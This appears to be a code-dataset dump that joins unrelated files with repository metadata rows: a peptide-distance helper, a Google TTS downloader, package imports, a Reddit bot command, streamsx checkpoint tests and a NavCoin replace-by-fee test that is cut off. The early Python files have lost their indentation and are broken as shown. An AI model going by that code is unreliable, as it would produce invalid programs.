method = os.path.basename(specifiedTrie).split('.')[0] if os.path.isfile(specifiedTrie) else specifiedTrie
try:
re = self.parse_external_result(
subprocess.check_output(cmd % (self.__matrix.path_to_matrix_file, trie, tmpFile.name, n),shell=True))
for k, vs in re.iteritems():
results.setdefault(pep_header, []).append(k)
results.setdefault("trie", []).append(method)
for i,v in enumerate(vs):
if i > 0:
results.setdefault("distance_{i}".format(i=i),[]).append(float(v))
else:
results.setdefault("distance", []).append(float(v))
except:
logging.warning("Could not make distance calculation for trie {}".format(trie))
os.remove(tmpFile.name)
return pandas.DataFrame.from_dict(results)
def parse_external_result(self, result):
"""
        :rtype : dict
"""
parsedResult = {}
for line in result.strip().split('\n'):
splitted = line.strip().split(" ")[-1].split(";")
distanceValues = []
peptide = splitted[0].split(":")[0]
for s in splitted[:-1]:
distanceValues.append(float(s.split(",")[-1])/float(len(peptide)))
parsedResult[peptide] = distanceValues
return parsedResult
| bsd-3-clause | 6,947,356,897,559,048,000 | 36.009804 | 125 | 0.63894 | false |
xe1gyq/nuupxe | core/GoogleTTS.py | 1 | 5682 | #!/usr/bin/python
import commands
import sys
import argparse
import re
import urllib, urllib2
import time
from collections import namedtuple
def split_text(input_text, max_length=100):
"""
Try to split between sentences to avoid interruptions mid-sentence.
Failing that, split between words.
See split_text_rec
"""
def split_text_rec(input_text, regexps, max_length=max_length):
"""
Split a string into substrings which are at most max_length.
Tries to make each substring as big as possible without exceeding
max_length.
Will use the first regexp in regexps to split the input into
substrings.
        If it is impossible to make all the segments less than or equal to
        max_length with a regexp then the next regexp in regexps will be used
        to split those into subsegments.
        If there are still substrings that are too big after all regexps have
        been used, those will be split at max_length.
Args:
input_text: The text to split.
regexps: A list of regexps.
If you want the separator to be included in the substrings you
can add parenthesis around the regular expression to create a
group. Eg.: '[ab]' -> '([ab])'
Returns:
a list of strings of maximum max_length length.
"""
if(len(input_text) <= max_length): return [input_text]
#mistakenly passed a string instead of a list
if isinstance(regexps, basestring): regexps = [regexps]
regexp = regexps.pop(0) if regexps else '(.{%d})' % max_length
text_list = re.split(regexp, input_text)
combined_text = []
#first segment could be >max_length
combined_text.extend(split_text_rec(text_list.pop(0), regexps, max_length))
for val in text_list:
current = combined_text.pop()
concat = current + val
if(len(concat) <= max_length):
combined_text.append(concat)
else:
combined_text.append(current)
#val could be >max_length
combined_text.extend(split_text_rec(val, regexps, max_length))
return combined_text
return split_text_rec(input_text.replace('\n', ''),
['([\,|\.|;]+)', '( )'])
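# Illustrative behaviour (example input, not part of the original script):
#   split_text("First sentence. Second sentence.", max_length=20)
# returns ['First sentence.', ' Second sentence.'] - punctuation is tried
# first, then spaces, and only as a last resort a hard cut every max_length
# characters.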
audio_args = namedtuple('audio_args',['language','output'])
def audio_extract(input_text='',args=None):
    # This accepts:
    # a dict,
    # an audio_args named tuple,
    # or an argparse namespace object
if args is None:
        args = audio_args(language='en',output=open('output/output.mp3', 'wb'))
    if type(args) is dict:
        args = audio_args(
            language=args.get('language','en'),
            output=open(args.get('output','output/output.mp3'), 'wb')
)
#process input_text into chunks
    #Google TTS only accepts texts up to (and including) 100 characters long.
    #Split the text into segments of at most 100 characters.
combined_text = split_text(input_text)
#download chunks and write them to the output file
for idx, val in enumerate(combined_text):
mp3url = "http://translate.google.com/translate_tts?tl=%s&q=%s&total=%s&idx=%s" % (
args.language,
urllib.quote(val),
len(combined_text),
idx)
headers = {"Host": "translate.google.com",
"Referer": "http://www.gstatic.com/translate/sound_player2.swf",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) "
"AppleWebKit/535.19 (KHTML, like Gecko) "
"Chrome/18.0.1025.163 Safari/535.19"
}
req = urllib2.Request(mp3url, '', headers)
sys.stdout.write('.')
sys.stdout.flush()
if len(val) > 0:
try:
response = urllib2.urlopen(req)
args.output.write(response.read())
time.sleep(.5)
except urllib2.URLError as e:
print ('%s' % e)
args.output.close()
print('Saved MP3 to %s' % args.output.name)
def text_to_speech_mp3_argparse():
description = 'Google TTS Downloader.'
parser = argparse.ArgumentParser(description=description,
epilog='tunnel snakes rule')
parser.add_argument('-o', '--output',
action='store', nargs='?',
help='Filename to output audio to',
type=argparse.FileType('wb'), default='output/output.mp3')
parser.add_argument('-l', '--language',
action='store',
nargs='?',
help='Language to output text to.', default='en')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-f', '--file',
type=argparse.FileType('r'),
help='File to read text from.')
group.add_argument('-s', '--string',
action='store',
nargs='+',
help='A string of text to convert to speech.')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
print parser.parse_args()
return parser.parse_args()
if __name__ == "__main__":
args = text_to_speech_mp3_argparse()
if args.file:
input_text = args.file.read()
if args.string:
input_text = ' '.join(map(str, args.string))
audio_extract(input_text=input_text, args=args)
commands.getstatusoutput("mpg123 output/output.mp3")
| apache-2.0 | 6,340,551,672,910,915,000 | 37.917808 | 91 | 0.567054 | false |
petrvanblokland/Xierpa3 | xierpa3/components/__init__.py | 1 | 1520 | # -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
from component import Component
from text import Text
from title import Title
from header import Header
from footer import Footer
from container import Container
from column import Column
from group import Group, ItemGroup # Group of floating rows
from menu import Menu
from logo import Logo
from page import Page
from article import Article, ArticleSideBar, ArticlesList
from sidebar import Sidebar
from navigation import Navigation, MobileNavigation
from tagcloud import TagCloud
from message import Message
from theme import Theme
from ruler import Ruler
from socialmedia import SocialMedia
from documentation import Documentation
from nothing import Nothing # Place holder component doing nothing. Can be used for debugging.
# Featured components
from featured.featuredbyimage import FeaturedByImage
from featured.featuredbyimagelist import FeaturedByImageList
from featured.featuredbytext import FeaturedByText
from featured.featuredbydiaptext import FeaturedByDiapText
from featured.posterhead import PosterHead
# Deprecated. Use featured.Featured instead
#from featured import FeaturedByImage, FeaturedByImageList, FeaturedByDiapText, FeaturedByText, FeaturedByTextList
| mit | -4,814,037,770,809,593,000 | 37 | 114 | 0.736184 | false |
c17r/TagTrain | src/tagtrain/tagtrain/tt_unblacklist.py | 1 | 1281 | from tagtrain import data
from tagtrain.tagtrain import TagTrainResponse, C_MEMBER, C_GROUP
class UnBlacklist(TagTrainResponse):
TYPE = TagTrainResponse.TYPE_COMMENTORMESSAGE
CMD_REGEX = f'unblacklist {C_MEMBER} {C_GROUP}?'
HELP_TEXT = ("`u/{botname} unblacklist <member-name> [<group-name>]` - "
"Allows previously blacklisted specified Member to add themselves, either for all "
"your Groups or just specified Group")
def run(self, reply, message, match):
self.LOGGER.debug('blacklist')
owner_name = message.author.name
member_name = match.group('member')
group_name = match.group('group')
try:
data.by_owner.unblacklist_user(owner_name, member_name, group_name)
except data.Group.DoesNotExist:
reply.append(f'Group `{group_name}` does not exist. Skipping.')
return
except data.Blacklist.DoesNotExist:
t = f'Group `{group_name}`' if group_name else 'Blanket'
reply.append(t + f' Blacklist for Member `{member_name}` does not exist. Skipping.')
return
t = f'Group `{group_name}`' if group_name else 'Blanket'
reply.append(t + f' Blacklist for Member `{member_name}` removed.')
| mit | 5,373,507,038,095,940,000 | 40.322581 | 100 | 0.63388 | false |
IBMStreams/streamsx.topology | test/python/spl/tests/test_splpy_checkpointing.py | 1 | 4571 | import unittest
from datetime import timedelta
from streamsx.topology.topology import *
from streamsx.topology import schema
from streamsx.topology.tester import Tester
import streamsx.spl.op as op
import streamsx.spl.toolkit
from streamsx.topology.context import ConfigParams
import spl_tests_utils as stu
# Test checkpointing in python decorated operators.
# These tests run in a way that should cause checkpoints to be created,
# but do not actually verify that the checkpoints are created and do
# not even attempt to restore them.
# There should be at least one test for each type of python decorated
# operator: source, map, filter, for_each, primitive_operator
class TestCheckpointing(unittest.TestCase):
_multiprocess_can_split_ = True
@classmethod
def setUpClass(cls):
"""Extract Python operators in toolkit"""
stu._extract_tk('testtkpy')
def setUp(self):
Tester.setup_standalone(self)
# Source operator
def test_source(self):
topo = Topology()
topo.checkpoint_period = timedelta(seconds=1)
streamsx.spl.toolkit.add_toolkit(topo, stu._tk_dir('testtkpy'))
bop = op.Source(topo, "com.ibm.streamsx.topology.pytest.checkpoint::TimeCounter", schema.StreamSchema('tuple<int32 f>').as_tuple(), params={'iterations':30,'period':0.1})
# streamsx.topology.context.submit('TOOLKIT', topo)
s = bop.stream
tester = Tester(topo)
tester.tuple_count(s, 30)
tester.contents(s, list(zip(range(0,30))))
tester.test(self.test_ctxtype, self.test_config)
# Source, filter, and map operators
def test_filter_map(self):
topo = Topology()
topo.checkpoint_period = timedelta(seconds=1)
streamsx.spl.toolkit.add_toolkit(topo, stu._tk_dir('testtkpy'))
timeCounter = op.Source(topo, "com.ibm.streamsx.topology.pytest.checkpoint::TimeCounter", schema.StreamSchema('tuple<int32 f>').as_tuple(), params={'iterations':30,'period':0.1})
evenFilter = op.Map("com.ibm.streamsx.topology.pytest.checkpoint::StatefulEvenFilter", timeCounter.stream, None, params={})
hpo = op.Map("com.ibm.streamsx.topology.pytest.checkpoint::StatefulHalfPlusOne", evenFilter.stream, None, params={})
s = hpo.stream
tester = Tester(topo)
tester.tuple_count(s, 15)
tester.contents(s, list(zip(range(1,16))))
tester.test(self.test_ctxtype, self.test_config)
# source, primitive, and for_each operators
# this will fail to compile because checkpointing is not supported
# for python primitive operators.
@unittest.expectedFailure
def test_primitive_foreach(self):
topo = Topology()
topo.checkpoint_period = timedelta(seconds=1)
streamsx.spl.toolkit.add_toolkit(topo, stu._tk_dir('testtkpy'))
timeCounter = op.Source(topo, "com.ibm.streamsx.topology.pytest.checkpoint::TimeCounter", schema.StreamSchema('tuple<int32 f>').as_tuple(), params={'iterations':30,'period':0.1})
fizzbuzz = op.Map("com.ibm.streamsx.topology.pytest.checkpoint::FizzBuzzPrimitive", timeCounter.stream, schema.StreamSchema('tuple<int32 f, rstring c>').as_tuple())
verify = op.Sink("com.ibm.streamsx.topology.pytest.checkpoint::Verify", fizzbuzz.stream)
s = fizzbuzz.stream
tester = Tester(topo)
tester.tuple_count(s, 30)
tester.test(self.test_ctxtype, self.test_config)
# source, map, and for_each operators
def test_map_foreach(self):
topo = Topology()
topo.checkpoint_period = timedelta(seconds=1)
streamsx.spl.toolkit.add_toolkit(topo, stu._tk_dir('testtkpy'))
timeCounter = op.Source(topo, "com.ibm.streamsx.topology.pytest.checkpoint::TimeCounter", schema.StreamSchema('tuple<int32 f>').as_tuple(), params={'iterations':30,'period':0.1})
fizzbuzz = op.Map("com.ibm.streamsx.topology.pytest.checkpoint::FizzBuzzMap", timeCounter.stream, schema.StreamSchema('tuple<int32 f, rstring c>').as_tuple())
verify = op.Sink("com.ibm.streamsx.topology.pytest.checkpoint::Verify", fizzbuzz.stream)
s = fizzbuzz.stream
tester = Tester(topo)
tester.tuple_count(s, 30)
tester.test(self.test_ctxtype, self.test_config)
class TestDistributedCheckpointing(TestCheckpointing):
def setUp(self):
Tester.setup_distributed(self)
self.test_config[ConfigParams.SSL_VERIFY] = False
class TestSasCheckpointing(TestCheckpointing):
def setUp(self):
Tester.setup_streaming_analytics(self, force_remote_build=True)
| apache-2.0 | -4,023,316,734,859,502,000 | 46.123711 | 186 | 0.698972 | false |
navcoindev/navcoin-core | qa/rpc-tests/replace-by-fee.py | 1 | 21999 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test replace by fee code
#
from test_framework.test_framework import NavCoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
MAX_REPLACEMENT_LIMIT = 100
def txToHex(tx):
return bytes_to_hex_str(tx.serialize())
def make_utxo(node, amount, confirmed=True, scriptPubKey=CScript([1])):
"""Create a txout with a given amount and scriptPubKey
Mines coins as needed.
confirmed - txouts created will be confirmed in the blockchain;
unconfirmed otherwise.
"""
fee = 1*COIN
while node.getbalance() < satoshi_round((amount + fee)/COIN):
node.generate(100)
#print (node.getbalance(), amount, fee)
new_addr = node.getnewaddress()
#print new_addr
txid = node.sendtoaddress(new_addr, satoshi_round((amount+fee)/COIN))
tx1 = node.getrawtransaction(txid, 1)
txid = int(txid, 16)
i = None
for i, txout in enumerate(tx1['vout']):
#print i, txout['scriptPubKey']['addresses']
if txout['scriptPubKey']['addresses'] == [new_addr]:
#print i
break
assert i is not None
tx2 = CTransaction()
tx2.vin = [CTxIn(COutPoint(txid, i))]
tx2.vout = [CTxOut(amount, scriptPubKey)]
tx2.rehash()
signed_tx = node.signrawtransaction(txToHex(tx2))
txid = node.sendrawtransaction(signed_tx['hex'], True)
# If requested, ensure txouts are confirmed.
if confirmed:
mempool_size = len(node.getrawmempool())
while mempool_size > 0:
node.generate(1)
new_size = len(node.getrawmempool())
# Error out if we have something stuck in the mempool, as this
# would likely be a bug.
assert(new_size < mempool_size)
mempool_size = new_size
return COutPoint(int(txid, 16), 0)
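# Illustrative usage (assumed values, mirroring the tests below):
#   confirmed = make_utxo(node, int(1.1 * COIN))            # mined into a block
#   unconfirmed = make_utxo(node, int(0.1 * COIN), False)   # left in the mempool
# The returned COutPoint is then used as the prevout of the conflicting
# transactions each test builds.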
class ReplaceByFeeTest(NavCoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
self.setup_clean_chain = False
def setup_network(self):
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-maxorphantx=1000", "-debug",
"-relaypriority=0", "-whitelist=127.0.0.1",
"-limitancestorcount=50",
"-limitancestorsize=101",
"-limitdescendantcount=200",
"-limitdescendantsize=101"
]))
self.is_network_split = False
def run_test(self):
make_utxo(self.nodes[0], 1*COIN)
print("Running test simple doublespend...")
self.test_simple_doublespend()
print("Running test doublespend chain...")
self.test_doublespend_chain()
print("Running test doublespend tree...")
self.test_doublespend_tree()
print("Running test replacement feeperkb...")
self.test_replacement_feeperkb()
print("Running test spends of conflicting outputs...")
self.test_spends_of_conflicting_outputs()
print("Running test new unconfirmed inputs...")
self.test_new_unconfirmed_inputs()
print("Running test too many replacements...")
self.test_too_many_replacements()
print("Running test opt-in...")
self.test_opt_in()
print("Running test prioritised transactions...")
self.test_prioritised_transactions()
print("Passed\n")
def test_simple_doublespend(self):
"""Simple doublespend"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Should fail because we haven't changed the fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(1*COIN, CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
# Extra 0.1 NAV fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
mempool = self.nodes[0].getrawmempool()
assert (tx1a_txid not in mempool)
assert (tx1b_txid in mempool)
assert_equal(tx1b_hex, self.nodes[0].getrawtransaction(tx1b_txid))
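    # Note on the behaviour exercised above (summary, not an extra check): a
    # replacement must pay a strictly higher fee than the transaction it
    # evicts, so the first tx1b (same output value, same fee) is rejected
    # with -26 while the version paying an extra 0.1 NAV is accepted.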
def test_doublespend_chain(self):
"""Doublespend of a long chain"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
prevout = tx0_outpoint
remaining_value = initial_nValue
chain_txids = []
while remaining_value > 10*COIN:
remaining_value -= 1*COIN
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = [CTxOut(remaining_value, CScript([1]))]
tx_hex = txToHex(tx)
txid = self.nodes[0].sendrawtransaction(tx_hex, True)
chain_txids.append(txid)
prevout = COutPoint(int(txid, 16), 0)
# Whether the double-spend is allowed is evaluated by including all
# child fees - 40 NAV - so this attempt is rejected.
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 30*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False) # transaction mistakenly accepted!
# Accepted with sufficient fee
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(1*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
mempool = self.nodes[0].getrawmempool()
for doublespent_txid in chain_txids:
assert(doublespent_txid not in mempool)
def test_doublespend_tree(self):
"""Doublespend of a big tree of transactions"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
def branch(prevout, initial_value, max_txs, tree_width=5, fee=0.0001*COIN, _total_txs=None):
if _total_txs is None:
_total_txs = [0]
if _total_txs[0] >= max_txs:
return
txout_value = (initial_value - fee) // tree_width
if txout_value < fee:
return
vout = [CTxOut(txout_value, CScript([i+1]))
for i in range(tree_width)]
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = vout
tx_hex = txToHex(tx)
assert(len(tx.serialize()) < 100000)
txid = self.nodes[0].sendrawtransaction(tx_hex, True)
yield tx
_total_txs[0] += 1
txid = int(txid, 16)
for i, txout in enumerate(tx.vout):
for x in branch(COutPoint(txid, i), txout_value,
max_txs,
tree_width=tree_width, fee=fee,
_total_txs=_total_txs):
yield x
fee = int(0.0001*COIN)
n = MAX_REPLACEMENT_LIMIT
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
# Attempt double-spend, will fail because too little fee paid
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee*n, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
# 1 NAV fee is enough
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee*n - 1*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
mempool = self.nodes[0].getrawmempool()
for tx in tree_txs:
tx.rehash()
assert (tx.hash not in mempool)
# Try again, but with more total transactions than the "max txs
# double-spent at once" anti-DoS limit.
for n in (MAX_REPLACEMENT_LIMIT+1, MAX_REPLACEMENT_LIMIT*2):
fee = int(0.0001*COIN)
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 2*fee*n, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
assert_equal("too many potential replacements" in exp.error['message'], True)
else:
assert(False)
for tx in tree_txs:
tx.rehash()
self.nodes[0].getrawtransaction(tx.hash)
def test_replacement_feeperkb(self):
"""Replacement requires fee-per-KB to be higher"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Higher fee, but the fee per KB is much lower, so the replacement is
# rejected.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*999000]))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
def test_spends_of_conflicting_outputs(self):
"""Replacements that spend conflicting tx outputs are rejected"""
utxo1 = make_utxo(self.nodes[0], int(1.2*COIN))
utxo2 = make_utxo(self.nodes[0], 3*COIN)
tx1a = CTransaction()
tx1a.vin = [CTxIn(utxo1, nSequence=0)]
tx1a.vout = [CTxOut(int(1.1*COIN), CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
tx1a_txid = int(tx1a_txid, 16)
        # Directly spend an output of the transaction we're replacing.
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0)]
tx2.vin.append(CTxIn(COutPoint(tx1a_txid, 0), nSequence=0))
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Spend tx1a's output to test the indirect case.
tx1b = CTransaction()
tx1b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx1b.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1b_hex = txToHex(tx1b)
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
tx1b_txid = int(tx1b_txid, 16)
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0),
CTxIn(COutPoint(tx1b_txid, 0))]
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
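    # Rationale for the two rejections above: a replacement may not spend an
    # output of a transaction it would evict, whether directly (tx1a's output)
    # or via a descendant (tx1b's output), because that output ceases to exist
    # once the conflicting transaction is removed from the mempool.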
def test_new_unconfirmed_inputs(self):
"""Replacements that add new unconfirmed inputs are rejected"""
confirmed_utxo = make_utxo(self.nodes[0], int(1.1*COIN))
unconfirmed_utxo = make_utxo(self.nodes[0], int(0.1*COIN), False)
tx1 = CTransaction()
tx1.vin = [CTxIn(confirmed_utxo)]
tx1.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1_hex = txToHex(tx1)
tx1_txid = self.nodes[0].sendrawtransaction(tx1_hex, True)
tx2 = CTransaction()
tx2.vin = [CTxIn(confirmed_utxo), CTxIn(unconfirmed_utxo)]
tx2.vout = tx1.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
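    # Rationale: per the BIP125-style rules this test exercises, a replacement
    # may only use unconfirmed inputs that were already spent by the
    # transactions it replaces; pulling in a brand-new unconfirmed input
    # (unconfirmed_utxo here) is rejected outright.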
def test_too_many_replacements(self):
"""Replacements that evict too many transactions are rejected"""
# Try directly replacing more than MAX_REPLACEMENT_LIMIT
# transactions
# Start by creating a single transaction with many outputs
initial_nValue = 10*COIN
utxo = make_utxo(self.nodes[0], initial_nValue)
fee = int(0.0001*COIN)
split_value = int((initial_nValue-fee)/(MAX_REPLACEMENT_LIMIT+1))
actual_fee = initial_nValue - split_value*(MAX_REPLACEMENT_LIMIT+1)
outputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
outputs.append(CTxOut(split_value, CScript([1])))
splitting_tx = CTransaction()
splitting_tx.vin = [CTxIn(utxo, nSequence=0)]
splitting_tx.vout = outputs
splitting_tx_hex = txToHex(splitting_tx)
txid = self.nodes[0].sendrawtransaction(splitting_tx_hex, True)
txid = int(txid, 16)
# Now spend each of those outputs individually
for i in range(MAX_REPLACEMENT_LIMIT+1):
tx_i = CTransaction()
tx_i.vin = [CTxIn(COutPoint(txid, i), nSequence=0)]
tx_i.vout = [CTxOut(split_value-fee, CScript([b'a']))]
tx_i_hex = txToHex(tx_i)
self.nodes[0].sendrawtransaction(tx_i_hex, True)
# Now create doublespend of the whole lot; should fail.
# Need a big enough fee to cover all spending transactions and have
# a higher fee rate
double_spend_value = (split_value-100*fee)*(MAX_REPLACEMENT_LIMIT+1)
inputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
inputs.append(CTxIn(COutPoint(txid, i), nSequence=0))
double_tx = CTransaction()
double_tx.vin = inputs
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
try:
self.nodes[0].sendrawtransaction(double_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
assert_equal("too many potential replacements" in exp.error['message'], True)
else:
assert(False)
# If we remove an input, it should pass
double_tx = CTransaction()
double_tx.vin = inputs[0:-1]
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
self.nodes[0].sendrawtransaction(double_tx_hex, True)
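    # Note: MAX_REPLACEMENT_LIMIT mirrors the anti-DoS cap on how many mempool
    # transactions a single replacement may evict (100 in the BIP125 design).
    # With MAX_REPLACEMENT_LIMIT+1 conflicting spends the broadcast fails;
    # dropping one input brings the count back within the cap, so it succeeds.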
def test_opt_in(self):
""" Replacing should only work if orig tx opted in """
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a non-opting in transaction
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0xffffffff)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Shouldn't be able to double-spend
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
print(tx1b_txid)
assert(False)
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a different non-opting in transaction
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0xfffffffe)]
tx2a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx2a_hex = txToHex(tx2a)
tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, True)
# Still shouldn't be able to double-spend
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx2b_hex = txToHex(tx2b)
try:
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Now create a new transaction that spends from tx1a and tx2a
# opt-in on one of the inputs
# Transaction should be replaceable on either input
tx1a_txid = int(tx1a_txid, 16)
tx2a_txid = int(tx2a_txid, 16)
tx3a = CTransaction()
tx3a.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0xffffffff),
CTxIn(COutPoint(tx2a_txid, 0), nSequence=0xfffffffd)]
tx3a.vout = [CTxOut(int(0.9*COIN), CScript([b'c'])), CTxOut(int(0.9*COIN), CScript([b'd']))]
tx3a_hex = txToHex(tx3a)
self.nodes[0].sendrawtransaction(tx3a_hex, True)
tx3b = CTransaction()
tx3b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx3b.vout = [CTxOut(int(0.5*COIN), CScript([b'e']))]
tx3b_hex = txToHex(tx3b)
tx3c = CTransaction()
tx3c.vin = [CTxIn(COutPoint(tx2a_txid, 0), nSequence=0)]
tx3c.vout = [CTxOut(int(0.5*COIN), CScript([b'f']))]
tx3c_hex = txToHex(tx3c)
self.nodes[0].sendrawtransaction(tx3b_hex, True)
# If tx3b was accepted, tx3c won't look like a replacement,
# but make sure it is accepted anyway
self.nodes[0].sendrawtransaction(tx3c_hex, True)
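    # Signaling recap for the cases above: an input opts its transaction in to
    # replacement when its nSequence is 0xfffffffd or lower; 0xfffffffe and
    # 0xffffffff do not signal, which is why tx1a and tx2a could not be
    # double-spent, while tx3a (one signaling input) is replaceable on either
    # of the outputs it spends.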
def test_prioritised_transactions(self):
# Ensure that fee deltas used via prioritisetransaction are
# correctly used by replacement logic
# 1. Check that feeperkb uses modified fees
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Higher fee, but the actual fee per KB is much lower.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
